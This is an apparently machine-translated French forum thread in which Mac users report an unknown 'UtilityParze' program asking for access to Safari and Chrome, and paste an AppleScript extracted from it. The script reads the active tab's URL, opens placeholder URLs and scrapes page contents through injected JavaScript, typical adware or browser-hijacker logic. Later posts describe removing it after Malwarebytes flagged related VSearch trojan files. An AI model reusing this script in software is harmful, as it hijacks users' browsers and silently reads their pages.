J'utilise un MacBook Air avec OS X Catalina.
Aujourd'hui, lorsque j'ai ouvert Safari, une boîte de dialogue de sécurité a progressé de demander s'il faut autoriser TILITYPARZE d'accéder à SAFARI. Je n'ai trouvé aucune mention de cette application en ligne jusqu'à présent, mais j'ai trouvé un exécutable à /Users/<me>/Library/UpdatesMac/UtilityParze/UtilityParze
Dans mon système de fichiers.
C'est surtout pas lisible par l'homme mais voici un script intégré:
if application "Safari" is running then
run script "tell application \"Safari\" to return URL of front document"
end if
if application "Safari" is running then
tell application id (id of application "Safari") to open location "[URL_TO_OPEN]"
tell application id (id of application "Safari") to activate
delay 5.0
end if
if application "Safari" is running then
run script "tell application \"Safari\" to set the activeIndex to index of current tab of front window
tell application id (id of application \"Safari\") to open location \"[UA_URL]\"
tell application id (id of application \"Safari\") to set the content to the text of document 1
repeat until length of (content as string) is not 0
delay 0.2
tell application id (id of application \"Safari\") to set the content to the text of document 1
end repeat
tell front window of application \"Safari\" to close last tab
tell front window of application \"Safari\" to set current tab to tab activeIndex
return content as string"
end if
if application "Google Chrome" is running then
run script "tell application \"Google Chrome\" to get URL of active tab of first window"
end if
if application "Google Chrome" is running then
tell application id (id of application "Google Chrome") to open location "[URL_TO_OPEN]"
tell application id (id of application "Google Chrome") to activate
delay 5.0
end if
if application "Google Chrome" is running then
tell application "Google Chrome"
open location "[UA_URL]"
end tell
end if
if application "Google Chrome" is running then
run script "tell application \"Google Chrome\"
set the activeUrl to get URL of front window's active tab
open location \"[UA_URL]\"
set content to execute front window's active tab javascript \"document.getElementsByTagName('body')[0].innerHTML\"
repeat until length of (content as string) is not 0
delay 0.2
set content to execute front window's active tab javascript \"document.getElementsByTagName('body')[0].innerHTML\"
end repeat
tell front window's active tab to close
set tabIndex to 0
repeat with currentTab in (tabs of (front window))
set tabIndex to tabIndex + 1
if URL of currentTab is activeUrl then
set (active tab index of (front window)) to tabIndex
exit repeat
end if
end repeat
return content as string
end tell"
end if
Quelqu'un a-t-il entendu parler de ce programme? Jusqu'à présent, je viens de refuser l'accès mais je ne l'ai pas supprimé. Je suppose que c'est quelque chose d'agaçant qui relève initialement une page lorsque j'essaie d'ouvrir un navigateur.
Je viens de (le dimanche 12 janvier 2020 vers 9h52) J'avais une invite "UtilityParve" similaire figurant dans Mojave demandant la permission d'accéder à Google Chrome. Je n'ai pas autorisé l'accès.
J'ai eu des demandes d'accès aux navigateurs mystérieuses similaires dans le passé qui étaient connectées à des logiciels publicitaires que je devais effacer manuellement du système.
"Macperformance" est un exemple qui semble retrouver à plusieurs reprises son chemin dans un endroit très similaire de la "bibliothèque" de l'utilisateur actif. Je ne sais pas s'il y a une connexion directe entre "UtilityParve" et "Macperformance", mais à ce moment-là, tous les deux sont présents dans ma bibliothèque.
"UTILITYPARVE est situé dans le dossier" UpdateDateSmac ", tandis que" Macperformance "est situé dans le dossier" UpdateMac ".
Basé sur l'absence d'une description de sa fonction en ligne, je supprimerai "UtilityParve" ainsi que "MacPerformance" qui est considérée comme logique.
J'ai eu un problème similaire de trouver des fichiers bizarres dans le dossier Landagents et peu d'autres emplacements dans le dossier de la bibliothèque. UTILITITENTDATA.PLIST, UTILITITYPARZE.PLIST et une longue liste de fichiers Trojan VSearch (MacinstallPall et quelques fichiers MACINSTALL *% & + @ ont été parmi eux. Selon les malwarebytes, ils étaient malwares, devaient être mis en quarantaine. Je suis d'abord mis en quarantaine, puis supprimé eux.